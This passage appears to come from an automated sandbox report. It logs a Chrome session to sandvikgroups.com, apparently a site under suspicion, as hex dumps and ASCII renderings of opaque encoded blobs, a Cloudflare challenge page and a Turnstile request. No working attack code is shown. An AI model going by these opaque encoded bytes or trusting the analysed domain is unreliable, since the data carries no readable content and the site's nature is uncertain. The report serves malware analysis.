2f 63 47 37 2b 67 44 6d
                                        Data Ascii: QgbJAIlHyZQRiw8EzA1DE8OVygUJyVYRzJMVE02Wl05WFhgYkJrYj9ARm9udGEyY1NYcUtncWY4SXtjYWWGflJnRFl+bGV7a1uIa4lkUk6DTlRZiJJsXVGZkXBik6OafXF8fIV8on54fKyGfYeWprCIkLCjiZW+mpR4i7S7grqwhcrHn4W5yMi8jMenv5SNqrCmyI3Xzr+04KrX1+Xd1JnHptjo2rW66sDs4qXz7LLXwcLt2cnt8Nm6/cG7+gDm
                                        2025-01-07 21:05:58 UTC1369INData Raw: 73 39 4f 30 56 4b 4a 31 4a 48 46 6c 49 6c 46 69 55 78 56 43 56 55 57 54 52 64 54 44 46 56 4a 45 39 63 51 79 67 70 57 79 6c 6e 54 57 78 74 4f 31 74 41 4c 54 35 6b 51 7a 64 33 56 6c 74 35 65 45 39 57 50 31 64 55 64 31 52 5a 54 33 35 35 55 34 74 67 56 46 31 69 67 56 42 4b 59 6d 4e 6c 68 33 2b 4a 54 35 47 4a 5a 58 64 7a 63 4a 64 31 64 58 75 57 59 33 56 64 66 4b 47 46 6f 46 32 66 6d 35 79 62 72 32 4f 51 73 49 61 6e 73 37 65 6f 69 36 4f 44 6e 49 31 38 6e 35 71 66 77 37 4b 37 76 37 48 44 6b 5a 4f 58 69 6f 69 6c 76 36 54 51 70 36 36 73 30 39 4f 57 69 63 69 71 72 73 66 61 6d 37 72 57 30 64 57 78 32 4f 4f 2b 34 4c 71 6c 78 75 72 56 79 37 76 48 74 37 33 74 77 4f 62 4e 39 66 44 6d 79 4f 54 6e 30 63 37 6f 2b 38 2b 35 30 67 44 7a 74 76 58 54 77 50 48 66 42 74 37 62 34
                                        Data Ascii: s9O0VKJ1JHFlIlFiUxVCVUWTRdTDFVJE9cQygpWylnTWxtO1tALT5kQzd3Vlt5eE9WP1dUd1RZT355U4tgVF1igVBKYmNlh3+JT5GJZXdzcJd1dXuWY3VdfKGFoF2fm5ybr2OQsIans7eoi6ODnI18n5qfw7K7v7HDkZOXioilv6TQp66s09OWiciqrsfam7rW0dWx2OO+4LqlxurVy7vHt73twObN9fDmyOTn0c7o+8+50gDztvXTwPHfBt7b4
                                        2025-01-07 21:05:58 UTC1369INData Raw: 6e 50 30 34 51 52 79 4d 4e 4c 56 70 66 4b 54 39 42 4d 7a 42 55 48 6c 31 50 47 6c 78 72 51 56 74 4c 4a 30 67 72 54 30 6f 6c 62 45 5a 47 5a 6d 42 31 57 58 6b 34 65 56 41 33 55 6d 35 35 63 56 68 38 64 31 31 57 67 32 4a 39 69 32 56 2b 59 6d 4e 6f 55 6f 74 63 58 31 4a 74 56 6d 35 72 59 34 78 6c 58 4a 4f 50 63 58 56 78 68 46 75 65 63 6e 42 6d 6c 58 65 41 66 61 65 4c 70 36 39 77 72 57 74 2f 73 58 42 76 63 71 36 73 6e 59 68 30 73 72 69 37 6d 70 65 78 6c 62 43 39 70 35 50 4b 77 72 69 62 69 72 65 6e 6f 37 32 4e 6b 74 62 42 6c 71 6a 61 32 39 69 54 73 71 69 74 6b 71 36 69 75 5a 2f 42 34 4c 66 51 6f 38 58 48 34 61 54 63 72 61 4b 70 35 74 53 38 38 74 54 42 31 75 50 57 32 65 72 4f 2f 75 44 76 2b 4f 76 4c 33 72 73 47 39 64 37 65 2b 2b 47 2b 32 74 6f 4a 32 4f 45 47 37 41
                                        Data Ascii: nP04QRyMNLVpfKT9BMzBUHl1PGlxrQVtLJ0grT0olbEZGZmB1WXk4eVA3Um55cVh8d11Wg2J9i2V+YmNoUotcX1JtVm5rY4xlXJOPcXVxhFuecnBmlXeAfaeLp69wrWt/sXBvcq6snYh0sri7mpexlbC9p5PKwribireno72NktbBlqja29iTsqitkq6iuZ/B4LfQo8XH4aTcraKp5tS88tTB1uPW2erO/uDv+OvL3rsG9d7e++G+2toJ2OEG7A
                                        2025-01-07 21:05:58 UTC1369INData Raw: 4c 30 64 62 4b 45 6c 68 54 69 4d 2b 46 78 34 68 4d 46 38 36 5a 32 78 57 58 45 6c 66 51 6d 6c 43 56 55 38 6f 62 58 64 75 4e 47 30 32 57 56 74 30 55 45 31 59 5a 48 4e 37 57 32 64 34 65 6f 4a 64 61 6f 61 4e 65 47 39 52 68 55 74 4f 55 32 75 53 5a 6c 69 53 64 34 65 64 57 35 4a 66 6e 57 32 42 57 6f 46 31 6c 4b 53 44 6b 32 75 55 71 49 4a 38 6e 70 39 39 6f 61 56 72 62 58 2b 6b 70 49 75 7a 6c 36 57 52 65 6e 2b 31 72 35 64 32 75 37 43 54 75 62 32 42 69 37 56 2f 69 36 4c 4c 70 37 75 63 70 34 65 4e 72 64 58 4b 6c 4c 47 37 74 64 2b 58 79 72 66 56 72 73 37 54 34 62 2b 6f 33 71 72 6f 76 71 72 4d 7a 73 66 4f 77 63 72 68 72 72 58 77 37 74 57 77 38 72 57 36 76 74 44 59 73 2b 34 42 32 65 2f 78 39 62 72 45 32 74 55 46 32 65 4c 48 41 66 6b 4f 45 2f 33 51 30 4f 62 79 44 68 6e
                                        Data Ascii: L0dbKElhTiM+Fx4hMF86Z2xWXElfQmlCVU8obXduNG02WVt0UE1YZHN7W2d4eoJdaoaNeG9RhUtOU2uSZliSd4edW5JfnW2BWoF1lKSDk2uUqIJ8np99oaVrbX+kpIuzl6WRen+1r5d2u7CTub2Bi7V/i6LLp7ucp4eNrdXKlLG7td+XyrfVrs7T4b+o3qrovqrMzsfOwcrhrrXw7tWw8rW6vtDYs+4B2e/x9brE2tUF2eLHAfkOE/3Q0ObyDhn
                                        2025-01-07 21:05:58 UTC1369INData Raw: 46 51 37 56 7a 78 67 61 53 55 71 4b 44 31 41 57 57 52 42 51 79 74 4c 63 6b 59 32 64 57 6b 35 65 45 4e 55 52 6a 35 39 63 55 46 4e 53 30 49 2f 54 31 35 36 57 59 68 54 52 32 46 45 52 55 39 6d 58 56 74 50 59 30 31 6a 6c 34 69 43 69 70 52 6c 6b 6e 57 42 6a 33 4f 4f 65 33 74 31 58 35 36 48 6b 36 57 6b 6a 71 65 42 61 5a 4b 72 68 4b 79 69 63 6f 69 30 70 37 47 4e 76 4c 47 7a 6b 4c 75 33 6c 35 4f 30 75 63 4f 47 77 49 50 4b 78 4d 65 57 79 34 2f 48 30 71 33 48 79 71 2b 55 6c 38 47 31 6b 70 76 4a 75 70 61 30 79 63 32 73 75 62 2b 32 35 4e 6e 48 6f 4e 53 36 71 71 6a 72 32 2b 79 71 76 36 7a 48 34 65 33 74 37 39 50 69 79 4e 48 76 35 76 50 5a 34 62 2f 43 30 2b 58 78 2b 51 6e 34 78 4e 62 63 43 64 72 6f 79 2b 2f 68 42 68 62 66 39 52 4d 61 31 42 48 34 32 74 72 34 46 76 44 54
                                        Data Ascii: FQ7VzxgaSUqKD1AWWRBQytLckY2dWk5eENURj59cUFNS0I/T156WYhTR2FERU9mXVtPY01jl4iCipRlknWBj3OOe3t1X56Hk6WkjqeBaZKrhKyicoi0p7GNvLGzkLu3l5O0ucOGwIPKxMeWy4/H0q3Hyq+Ul8G1kpvJupa0yc2sub+25NnHoNS6qqjr2+yqv6zH4e3t79PiyNHv5vPZ4b/C0+Xx+Qn4xNbcCdroy+/hBhbf9RMa1BH42tr4FvDT
                                        2025-01-07 21:05:58 UTC1369INData Raw: 56 6c 4e 46 64 62 53 44 34 36 58 57 6f 77 4d 6b 4e 6f 50 30 30 79 5a 55 64 31 63 6a 52 39 55 46 56 4c 51 6b 78 56 50 48 52 41 50 33 31 35 69 33 70 36 5a 6b 68 77 59 56 46 52 66 55 32 49 5a 70 4a 31 63 33 53 4b 63 59 32 5a 61 33 56 78 68 58 4a 32 6f 36 6c 39 65 35 74 2b 70 6f 64 33 62 61 61 4b 67 4b 4f 50 73 33 2b 30 72 4b 32 4f 6d 4a 31 33 76 48 79 66 76 70 53 2b 66 49 4b 31 6b 63 47 45 6f 72 2b 6c 6d 73 48 47 69 71 6d 74 71 4d 75 6f 73 63 37 55 70 71 71 34 7a 4c 43 34 76 36 2b 75 32 38 50 6d 6e 4e 75 37 77 74 61 2f 71 4e 61 2f 36 4b 33 5a 76 38 7a 54 35 37 4c 66 30 73 72 62 37 74 48 74 35 2b 66 51 36 64 2f 33 7a 64 6a 77 32 4d 4c 53 43 50 54 4b 32 51 58 6a 7a 4f 76 4d 79 65 6a 76 45 64 45 56 42 74 48 38 44 63 2f 38 32 66 30 56 36 67 4c 33 46 66 30 4a 35
                                        Data Ascii: VlNFdbSD46XWowMkNoP00yZUd1cjR9UFVLQkxVPHRAP315i3p6ZkhwYVFRfU2IZpJ1c3SKcY2Za3VxhXJ2o6l9e5t+pod3baaKgKOPs3+0rK2OmJ13vHyfvpS+fIK1kcGEor+lmsHGiqmtqMuosc7Upqq4zLC4v6+u28PmnNu7wta/qNa/6K3Zv8zT57Lf0srb7tHt5+fQ6d/3zdjw2MLSCPTK2QXjzOvMyejvEdEVBtH8Dc/82f0V6gL3Ff0J5
                                        2025-01-07 21:05:58 UTC1369INData Raw: 6a 52 6b 74 4f 61 47 31 30 61 45 4e 6f 62 6c 42 38 57 45 64 58 66 31 6b 38 4f 59 57 46 57 58 2b 48 64 54 78 4b 58 59 68 75 62 34 39 4a 67 6d 46 63 6b 6c 39 56 68 59 69 4a 54 58 31 56 6c 32 6c 65 69 34 79 56 70 5a 4a 59 70 5a 35 78 63 71 65 43 5a 32 69 41 67 61 70 36 66 34 4b 53 6c 70 53 41 61 37 4b 59 6a 37 47 34 66 62 69 53 73 4c 6d 41 72 34 48 43 6f 5a 71 7a 6c 4b 71 49 78 49 69 66 77 71 71 70 30 4d 6e 4c 6c 4c 57 6d 72 36 36 36 31 4c 57 71 73 39 33 4c 74 4a 2b 6a 31 4e 2b 68 32 4f 75 2b 79 37 33 6b 78 61 4c 4b 7a 4c 43 73 35 2f 4f 70 74 76 72 57 78 66 50 74 76 73 76 34 2f 65 44 56 32 50 37 59 78 2b 6e 71 2f 75 7a 72 32 50 59 4f 42 75 44 4f 45 77 38 53 47 4f 67 47 47 4f 6a 73 38 76 72 77 2b 51 7a 67 32 69 58 69 47 68 50 30 4b 76 6e 33 4b 43 67 66 43 75
                                        Data Ascii: jRktOaG10aENoblB8WEdXf1k8OYWFWX+HdTxKXYhub49JgmFckl9VhYiJTX1Vl2lei4yVpZJYpZ5xcqeCZ2iAgap6f4KSlpSAa7KYj7G4fbiSsLmAr4HCoZqzlKqIxIifwqqp0MnLlLWmr6661LWqs93LtJ+j1N+h2Ou+y73kxaLKzLCs5/OptvrWxfPtvsv4/eDV2P7Yx+nq/uzr2PYOBuDOEw8SGOgGGOjs8vrw+Qzg2iXiGhP0Kvn3KCgfCu
                                        2025-01-07 21:05:58 UTC1369INData Raw: 56 55 42 61 52 6b 52 76 52 6c 5a 59 58 58 70 64 59 59 4a 6d 58 33 69 43 59 6c 70 6e 57 49 6c 6f 57 49 4a 38 61 49 57 43 63 47 65 58 67 32 4a 6e 6a 6e 69 62 61 33 6d 53 66 57 36 69 6b 6f 4a 79 63 6f 6c 34 64 34 56 31 70 49 4f 65 66 59 4f 41 6a 6d 79 47 68 4c 69 6d 6c 70 71 47 75 37 53 4d 76 70 53 71 65 34 32 4e 70 63 4f 6f 6c 71 65 39 68 38 57 34 77 71 43 61 75 63 75 6f 6a 61 33 48 6c 4c 57 69 30 4e 65 37 70 73 6d 2f 32 72 4f 77 6d 64 79 30 6f 61 4f 78 75 61 47 6a 35 39 66 61 75 62 76 64 33 64 44 79 30 4c 50 74 77 71 76 76 30 63 33 53 30 64 69 2f 2b 39 72 65 42 4f 4c 42 33 50 33 44 31 4d 48 59 32 75 4c 72 35 77 54 4d 30 39 44 55 36 67 72 69 31 51 37 59 47 66 59 41 41 65 34 55 33 76 58 6b 34 68 48 66 42 67 45 4a 4b 67 45 72 43 43 50 69 4a 65 77 44 42 67 72
                                        Data Ascii: VUBaRkRvRlZYXXpdYYJmX3iCYlpnWIloWIJ8aIWCcGeXg2Jnjniba3mSfW6ikoJycol4d4V1pIOefYOAjmyGhLimlpqGu7SMvpSqe42NpcOolqe9h8W4wqCaucuoja3HlLWi0Ne7psm/2rOwmdy0oaOxuaGj59faubvd3dDy0LPtwqvv0c3S0di/+9reBOLB3P3D1MHY2uLr5wTM09DU6gri1Q7YGfYAAe4U3vXk4hHfBgEJKgErCCPiJewDBgr


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449757188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:58 UTC867OUTGET /favicon.ico HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:59 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:05:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:05:59 UTC955INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 45 65 69 4f 55 4c 62 58 47 54 31 47 70 4d 33 62 48 50 78 4a 36 46 6a 37 53 42 63 6e 51 44 55 73 70 6c 4f 78 66 65 63 30 45 6a 31 48 58 51 7a 2b 30 64 49 61 36 39 6c 59 5a 36 75 6a 49 59 68 4a 47 54 2f 4d 31 6f 36 67 30 4e 75 74 68 72 2f 32 42 42 57 6d 47 56 76 4f 52 68 32 37 6e 42 76 4f 4e 52 66 66 65 6d 76 79 38 55 4b 6e 56 78 4b 50 73 64 32 67 6d 62 4e 45 2f 66 48 6a 33 49 57 32 5a 43 74 55 2b 2b 79 6d 39 38 43 4d 35 4f 5a 2b 45 74 6f 6c 66 41 3d 3d 24 5a 45 35 63 32 47 68 73 59 33 6a 36 78 72 45 38 57 71 5a 67 77 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: EeiOULbXGT1GpM3bHPxJ6Fj7SBcnQDUsplOxfec0Ej1HXQz+0dIa69lYZ6ujIYhJGT/M1o6g0Nuthr/2BBWmGVvORh27nBvONRffemvy8UKnVxKPsd2gmbNE/fHj3IW2ZCtU++ym98CM5OZ+EtolfA==$ZE5c2GhsY3j6xrE8WqZgwA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:05:59 UTC1369INData Raw: 32 31 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 211e<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:05:59 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:05:59 UTC1369INData Raw: 6c 58 48 73 78 48 38 4e 4d 65 42 67 34 4e 5a 6f 56 67 53 49 53 47 55 73 73 62 36 61 5f 5a 76 4c 38 39 78 66 43 65 4b 34 78 37 7a 53 77 59 34 31 4c 79 34 36 36 56 77 62 71 67 32 65 77 74 73 4f 6c 61 2e 4f 72 44 77 4b 35 56 47 77 59 4d 58 71 62 6a 49 4d 6c 6c 44 4b 62 72 44 4a 34 51 6f 79 67 48 63 39 70 7a 75 47 44 67 6b 34 6f 41 41 49 6a 47 57 48 51 4b 78 50 33 36 58 37 5f 77 69 5a 39 45 4b 67 69 47 63 58 64 48 7a 6b 75 32 43 36 5a 63 66 48 56 5f 59 45 43 79 31 69 65 68 76 53 34 59 48 56 2e 64 77 45 32 73 67 37 45 72 52 67 4c 70 51 4d 57 77 69 2e 6a 68 4f 31 65 78 4f 61 62 74 56 52 32 48 4d 52 78 6b 31 65 52 55 45 57 76 5a 44 43 5a 75 6e 5f 46 42 75 43 55 31 31 39 30 56 53 50 65 66 37 57 4a 79 78 6d 35 5f 39 44 35 34 4e 33 4b 48 4e 33 47 66 56 62 4e 58 64
                                        Data Ascii: lXHsxH8NMeBg4NZoVgSISGUssb6a_ZvL89xfCeK4x7zSwY41Ly466Vwbqg2ewtsOla.OrDwK5VGwYMXqbjIMllDKbrDJ4QoygHc9pzuGDgk4oAAIjGWHQKxP36X7_wiZ9EKgiGcXdHzku2C6ZcfHV_YECy1iehvS4YHV.dwE2sg7ErRgLpQMWwi.jhO1exOabtVR2HMRxk1eRUEWvZDCZun_FBuCU1190VSPef7WJyxm5_9D54N3KHN3GfVbNXd
                                        2025-01-07 21:05:59 UTC1369INData Raw: 6d 38 7a 36 56 51 6e 4b 65 7a 63 51 7a 38 35 4a 5a 68 61 62 59 75 4d 49 58 65 72 41 63 61 51 41 4f 56 59 73 62 70 4d 32 32 4f 76 6e 78 6e 78 79 42 57 5f 6a 43 55 68 35 2e 4a 76 46 66 33 6e 49 68 47 55 6a 57 63 76 49 50 45 4d 4f 70 45 30 64 48 46 36 78 4f 46 62 43 43 7a 4e 73 61 30 59 37 66 70 5a 4c 73 30 5f 46 38 4a 4d 35 61 70 39 67 42 78 51 37 64 5f 2e 73 2e 47 35 2e 7a 4a 57 61 35 69 46 49 37 4f 64 76 59 53 68 64 35 34 48 74 78 4f 44 4c 4b 4e 53 37 76 59 6a 66 70 5f 72 63 30 76 52 5f 42 45 6e 4c 63 55 39 61 7a 6b 79 66 50 67 2e 6b 6b 70 55 4d 4e 66 53 63 35 5a 70 36 78 65 30 51 50 47 42 53 64 71 66 48 63 74 67 75 4a 4c 53 4a 57 6c 69 75 53 6e 58 75 64 55 4c 71 31 5f 43 72 34 55 79 53 53 57 38 59 64 50 42 78 43 5f 7a 57 6e 5a 6d 6b 6f 70 4b 78 77 50 46
                                        Data Ascii: m8z6VQnKezcQz85JZhabYuMIXerAcaQAOVYsbpM22OvnxnxyBW_jCUh5.JvFf3nIhGUjWcvIPEMOpE0dHF6xOFbCCzNsa0Y7fpZLs0_F8JM5ap9gBxQ7d_.s.G5.zJWa5iFI7OdvYShd54HtxODLKNS7vYjfp_rc0vR_BEnLcU9azkyfPg.kkpUMNfSc5Zp6xe0QPGBSdqfHctguJLSJWliuSnXudULq1_Cr4UySSW8YdPBxC_zWnZmkopKxwPF
                                        2025-01-07 21:05:59 UTC1369INData Raw: 31 36 77 4e 71 54 6c 6e 50 45 43 6f 35 70 49 31 36 39 63 31 6b 6d 33 42 50 59 6d 50 4e 71 39 39 70 50 50 51 77 6b 6f 49 43 43 73 4c 6a 75 35 65 43 79 44 45 68 47 37 79 2e 5a 6a 56 4f 46 50 6f 56 5f 6d 63 2e 66 45 4c 68 36 49 6b 6e 51 6f 6d 73 59 45 58 42 79 67 64 6c 62 79 30 6a 61 2e 68 54 62 5a 6b 49 58 34 64 41 36 55 62 46 32 4c 38 41 53 47 58 57 37 66 4a 4c 4c 75 41 51 4c 73 6a 49 7a 78 6a 65 75 74 6c 4c 43 30 58 6e 58 56 75 76 66 34 45 5f 78 66 2e 4b 46 52 31 7a 69 6f 43 4c 62 56 50 4a 70 57 38 76 53 65 41 33 78 56 63 6f 68 4d 4b 71 45 55 66 78 69 51 34 49 63 45 57 62 51 49 78 78 6f 67 69 6a 68 4b 6b 4c 47 55 79 7a 64 35 6b 67 68 38 59 58 58 71 6d 6e 71 38 4b 6a 72 30 47 47 53 44 64 2e 71 48 51 76 76 34 53 54 4c 6d 7a 42 34 50 6a 48 37 72 4f 59 50 6e
                                        Data Ascii: 16wNqTlnPECo5pI169c1km3BPYmPNq99pPPQwkoICCsLju5eCyDEhG7y.ZjVOFPoV_mc.fELh6IknQomsYEXBygdlby0ja.hTbZkIX4dA6UbF2L8ASGXW7fJLLuAQLsjIzxjeutlLC0XnXVuvf4E_xf.KFR1zioCLbVPJpW8vSeA3xVcohMKqEUfxiQ4IcEWbQIxxogijhKkLGUyzd5kgh8YXXqmnq8Kjr0GGSDd.qHQvv4STLmzB4PjH7rOYPn
                                        2025-01-07 21:05:59 UTC1369INData Raw: 71 66 6e 37 34 35 79 65 4a 71 63 47 6c 77 58 6a 66 70 47 45 4b 56 4c 79 5a 43 54 4c 66 5f 6d 46 6c 7a 74 47 70 37 31 6c 49 39 2e 61 4a 56 59 61 43 7a 69 58 45 6b 70 6a 47 53 78 2e 68 6c 61 35 6a 71 6e 44 31 51 47 48 75 36 67 65 77 6d 5a 6a 6a 32 51 71 5a 42 43 56 58 5a 36 55 75 71 33 62 4e 5f 33 75 4c 39 31 34 5a 45 45 31 73 2e 33 47 39 77 6b 4b 4f 50 35 33 34 68 56 4c 43 37 50 41 75 70 35 43 38 42 62 44 62 39 6e 50 50 6e 70 64 71 48 6e 30 47 43 66 39 78 2e 58 50 45 59 6d 6e 49 50 54 38 72 67 6b 44 53 61 4b 30 6c 74 4a 45 4e 62 57 30 2e 58 47 6e 2e 53 46 38 39 39 66 4d 53 4c 45 44 7a 67 6f 52 64 41 56 70 6f 50 35 67 4f 61 79 4f 38 46 6c 42 44 70 61 6e 54 6f 76 45 4f 44 59 6b 31 67 70 61 74 6e 71 64 6f 30 33 62 64 33 4d 55 43 79 52 4e 58 4a 4d 59 46 47 6d
                                        Data Ascii: qfn745yeJqcGlwXjfpGEKVLyZCTLf_mFlztGp71lI9.aJVYaCziXEkpjGSx.hla5jqnD1QGHu6gewmZjj2QqZBCVXZ6Uuq3bN_3uL914ZEE1s.3G9wkKOP534hVLC7PAup5C8BbDb9nPPnpdqHn0GCf9x.XPEYmnIPT8rgkDSaK0ltJENbW0.XGn.SF899fMSLEDzgoRdAVpoP5gOayO8FlBDpanTovEODYk1gpatnqdo03bd3MUCyRNXJMYFGm
                                        2025-01-07 21:05:59 UTC272INData Raw: 6d 74 6f 69 49 53 71 47 58 61 77 43 33 48 63 44 6b 63 7a 34 50 76 45 2d 31 37 33 36 32 38 33 39 35 39 2d 31 2e 30 2e 31 2e 31 2d 70 79 4a 59 61 4f 32 66 70 56 45 34 58 66 33 68 50 50 76 37 38 32 54 67 79 4a 42 34 4a 65 66 32 69 65 48 57 6d 33 33 77 6b 50 49 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 7d 7d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74
                                        Data Ascii: mtoiISqGXawC3HcDkcz4PvE-1736283959-1.0.1.1-pyJYaO2fpVE4Xf3hPPv782TgyJB4Jef2ieHWm33wkPI" + window._cf_chl_opt.cOgUHash);cpo.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(cpo);}());</script
                                        2025-01-07 21:05:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449758104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:59 UTC413OUTGET /turnstile/v0/g/849bfe45bf45/api.js?onload=FirmE4&render=explicit HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:59 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:59 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
